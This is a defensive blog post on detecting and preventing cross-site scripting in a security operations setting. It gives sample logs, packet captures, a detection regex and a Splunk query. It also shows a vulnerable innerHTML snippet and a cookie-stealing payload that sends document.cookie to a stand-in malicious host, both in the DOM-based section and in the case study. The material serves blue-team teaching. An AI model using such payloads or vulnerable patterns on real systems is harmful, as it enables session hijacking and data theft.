Detecting XSS (Cross-Site Scripting) Attacks in SOC Environment

This blog aims to provide cybersecurity professionals, especially blue teams, with the necessary knowledge to detect and mitigate Cross-Site Scripting (XSS) attacks. Our goal is to deepen your understanding of these threats and provide actionable strategies to enhance your security posture against XSS vulnerabilities.

‍

Brief Description

XSS attacks exploit vulnerabilities in web applications by injecting malicious scripts. These scripts can then execute in the browser of users, leading to data theft, session hijacking, and defacement of websites. Understanding these attacks is crucial for defending our digital environments against potential exploits.

‍

TL;DR

• XSS Threat and How it works: Exploits web application vulnerabilities to inject and execute malicious scripts.
• Root Cause: Often due to improper input validation and output encoding.
• Prevention: Focuses on secure coding practices and input/output handling.
• Detection and Mitigation: Combines automated tools (like WAFs and IDS) with manual techniques (like code reviews and security audits).

‍

How XSS Attacks Work

In a nutshell, attackers manipulate web application inputs to inject malicious scripts. These scripts can then run in the context of the victim's browser, leading to various malicious outcomes, such as stealing cookies, session tokens, or other sensitive data.

‍

Impact of Attacks

The potential damage includes data theft, defacement of websites, session hijacking, and spreading of malware. The consequences can be severe, leading to loss of user trust and potential legal ramifications.

‍

Understanding XSS Attacks

XSS attacks involve injecting malicious scripts into web applications. These scripts can then be executed by unsuspecting users' browsers, leading to various forms of exploitation.

‍

Types of XSS Attacks

1. Stored XSS: The malicious script is permanently stored on the target server (e.g., in a database) and is served to users.
2. Reflected XSS: The malicious script is reflected off a web server, typically via a URL, and executed immediately.
3. DOM-Based XSS: The malicious script is executed as a result of modifying the DOM environment in the victim's browser.

‍

Common Targets

Vulnerable systems typically include web applications that do not properly sanitize user input or fail to encode output correctly.

‍

Vulnerable Code

In this example, a JavaScript application renders user input without proper sanitization:

const userInput = "<%= userInput %>";
document.getElementById('output').innerHTML = userInput;

‍

Why This Code is Vulnerable?

This script is vulnerable because it directly injects user input into the HTML without sanitization or encoding. An attacker could inject a script that would execute in the browser, potentially leading to various exploits.

‍

Practical Examples

Example of XSS Attack Payload

<script>alert('XSS');</script>

‍

Alert Sample

2024-06-04 12:34:56,789 INFO [main] org.apache.catalina.core.StandardWrapperValve.invoke Servlet.service() for servlet [dispatcherServlet] in context with path [] threw exception [Request processing failed; nested exception is java.lang.SecurityException: XSS attempt detected]

‍

Additional Log Samples for Different Types of XSS

Stored XSS

Log entry showing persistent malicious script injection:

2024-06-05 14:21:30,987 INFO [main] org.apache.catalina.core.StandardWrapperValve.invoke User submitted a comment: "<script>document.cookie='XSS';</script>"
2024-06-05 14:21:32,876 INFO [main] org.apache.catalina.core.StandardWrapperValve.invoke Displaying comment: "<script>document.cookie='XSS';</script>"

‍

Example payload:

<script>document.cookie='XSS';</script>

‍

Reflected XSS

Log entry indicating reflected malicious script:

2024-06-06 09:15:10,543 INFO [main] org.apache.catalina.core.StandardWrapperValve.invoke Received search query: "<script>alert('XSS');</script>"
2024-06-06 09:15:12,654 INFO [main] org.apache.catalina.core.StandardWrapperValve.invoke Reflected search query result: "<script>alert('XSS');</script>"

‍

Example URL:

<http://example.com/search?q=><script>alert('XSS');</script>

‍

DOM-Based XSS

Log entry showing client-side script modification:

2024-06-07 11:42:00,321 INFO [main] org.apache.catalina.core.StandardWrapperValve.invoke User modified profile page with: "<script>document.location='http://malicious-site.com?cookie='+document.cookie;</script>"
2024-06-07 11:42:05,432 INFO [main] org.apache.catalina.core.StandardWrapperValve.invoke Rendering modified profile page.

‍

Example script:

document.location = '<http://malicious-site.com>?' + document.cookie;

‍

Capturing Traffic (Wireshark or Similar)

HTTP Request with Malicious Payload

GET /search?q=<script>alert('XSS');</script> HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: <http://example.com/>
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Connection: keep-alive

‍

HTTP Response with Malicious Script Execution

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 349
Connection: keep-alive

<html>
<head>
<title>Search Results</title>
</head>
<body>
<h1>Search Results for "<script>alert('XSS');</script>"</h1>
</body>
</html>

‍

TCP Stream Capture in Wireshark Showing XSS Payload

Frame 1234: 568 bytes on wire (4544 bits), 568 bytes captured (4544 bits)
Ethernet II, Src: 08:00:27:53:8b:dc (08:00:27:53:8b:dc), Dst: 52:54:00:12:35:02 (52:54:00:12:35:02)
Internet Protocol Version 4, Src: 192.168.1.100, Dst: 192.168.1.101
Transmission Control Protocol, Src Port: 49932, Dst Port: 80, Seq: 1, Ack: 1, Len: 502
Hypertext Transfer Protocol
    GET /search?q=<script>alert('XSS');</script> HTTP/1.1
    Host: example.com
    ...

‍

Detecting XSS Attacks

Detecting XSS attacks requires vigilance in both automated systems and manual review processes. Here's how security teams can enhance their detection capabilities:

‍

Signs of an Attack

Stay alert for signs that might indicate an attempt or a successful XSS attack:

• Unusual Outbound Requests: Requests to unexpected external servers or sites, often flagged by network monitoring tools.
• Unexpected Error Logs: Logs indicating script errors or unusual browser behavior.

‍

Log Sample for Detection

Review your application and server logs regularly for entries like the following, which could indicate an XSS attempt:

<script>alert('XSS');</script>

‍

Tools and Techniques for Detection

Leverage both automated tools and manual techniques to enhance your detection efforts:

‍

Automated Detection Tools

• Web Application Firewalls (WAFs): Configure your WAF to detect and block malicious scripts.
• Intrusion Detection Systems (IDS): Use IDS to monitor for signatures typical of XSS attacks, such as suspicious script patterns in HTTP requests.

‍

Regex Patterns for Logs

Implement regular expressions to catch suspicious patterns in log files. Here's a regex pattern that helps detect potential XSS payloads:

<script\\b[^>]*>(.*?)</script>

‍

This regex matches script tags in logs, indicating possible XSS attempts.

‍

Example Search Queries for Logs

When analyzing logs, you can use specific queries to filter out potential XSS attempts. For instance, in a logging tool like Splunk, you might use:

source="/var/log/application.log" "script" AND "alert"

‍

This query checks for logs indicating script tags with alert calls.

‍

Manual Techniques for Deeper Investigation

While automated tools can catch many attacks, manual review remains crucial:

• Security Audits and Penetration Testing: Regular audits and ethical hacking initiatives help identify vulnerabilities that automated tools might miss.
• Code Review: A manual review of application source code can uncover insecure practices such as improper input sanitization and encoding.
• Network Traffic Analysis: Look for anomalies in HTTP requests that could indicate attempts to inject malicious scripts.

‍

Prevention and Mitigation Strategies

To prevent XSS attacks, follow these best practices:

‍

Best Practices

Sanitize Inputs: Always sanitize user inputs to remove any malicious content.

• Encode Outputs: Ensure that any dynamic content rendered in the browser is properly encoded.
  
  
• Use Security Libraries: Utilize security libraries and frameworks that provide built-in protection against XSS.
  
  
• Regular Security Audits: Periodically review and test your application for vulnerabilities, including XSS.

‍

Security Measures

• Content Security Policy (CSP): Implement CSP to restrict the sources from which scripts can be loaded.
• Input Validation: Ensure that all inputs are validated for legitimacy.
• Error Handling: Properly handle application errors to avoid leaking information about the system's structure.

‍

Case Study: Real-Life XSS Attack

Let's examine a documented case of an XSS attack that targeted a major web application. For confidentiality, specific names are omitted.

‍

Background

The target was a widely used web application that had an unpatched vulnerability in its input sanitization. The vulnerability allowed attackers to inject malicious scripts into the application.

‍

Attack Details

The attack was first noticed when unusual user behavior was detected in the server logs. Here’s a more detailed look into the logs and the investigation process.

‍

Suspicious User Inputs

<script>document.location='http://malicious-site.com?cookie='+document.cookie;</script>

‍

Error Logs

2024-06-04 03:21:14,789 ERROR [main] org.apache.catalina.core.StandardWrapperValve.invoke Servlet.service() for servlet [dispatcherServlet] in context with path [] threw exception [Request processing failed; nested exception is java.lang.SecurityException: XSS attempt detected] with root cause
java.lang.SecurityException: XSS attempt detected

‍

Investigation and Findings

Initial Detection

• Automated Alerts: The IDS and WAF systems flagged unusual script patterns in HTTP requests.
• Manual Log Review: Security analysts noted repeated attempts to inject scripts into input fields.

‍

Detailed Log Analysis

• Analysts found multiple instances where the application executed scripts from user inputs, indicating improper input sanitization.
  
  

Requests like the following were frequently seen in the logs:

 <script>document.location='http://malicious-site.com?cookie='+document.cookie;</script>

‍

Network Traffic Analysis

• Anomalies in HTTP request patterns were observed, correlating with the timestamps of the suspicious log entries.
• Traffic analysis revealed that data was being sent to an IP address associated with known malicious activity.

‍

System Impact Assessment

• The investigation team discovered that user sessions were being hijacked and sensitive data, including cookies and session tokens, were being exfiltrated.
• Several user accounts were compromised as a result of the attack.

‍

Root Cause Analysis

• It was determined that the application did not properly sanitize user inputs, allowing the injection of malicious scripts.
• The specific code responsible for rendering user inputs was identified, and it lacked proper encoding and sanitization.

‍

Hands-on Course for XSS Attacks

If you're looking for a hands-on course to detecting web attacks, including XSS, here is the course link: Detecting Web Attacks

‍

Conclusion

XSS (Cross-Site Scripting) attacks are a serious threat to web applications, leading to data theft, session hijacking, and defacement. Detecting and preventing these attacks require a combination of automated tools like Web Application Firewalls (WAFs) and Intrusion Detection Systems (IDS), as well as manual techniques such as code reviews and security audits.

Key strategies include sanitizing inputs, encoding outputs, implementing Content Security Policy (CSP), and maintaining vigilant monitoring of logs and network traffic. A proactive approach, continuous education, and adherence to best practices are essential to protect your systems from XSS attacks.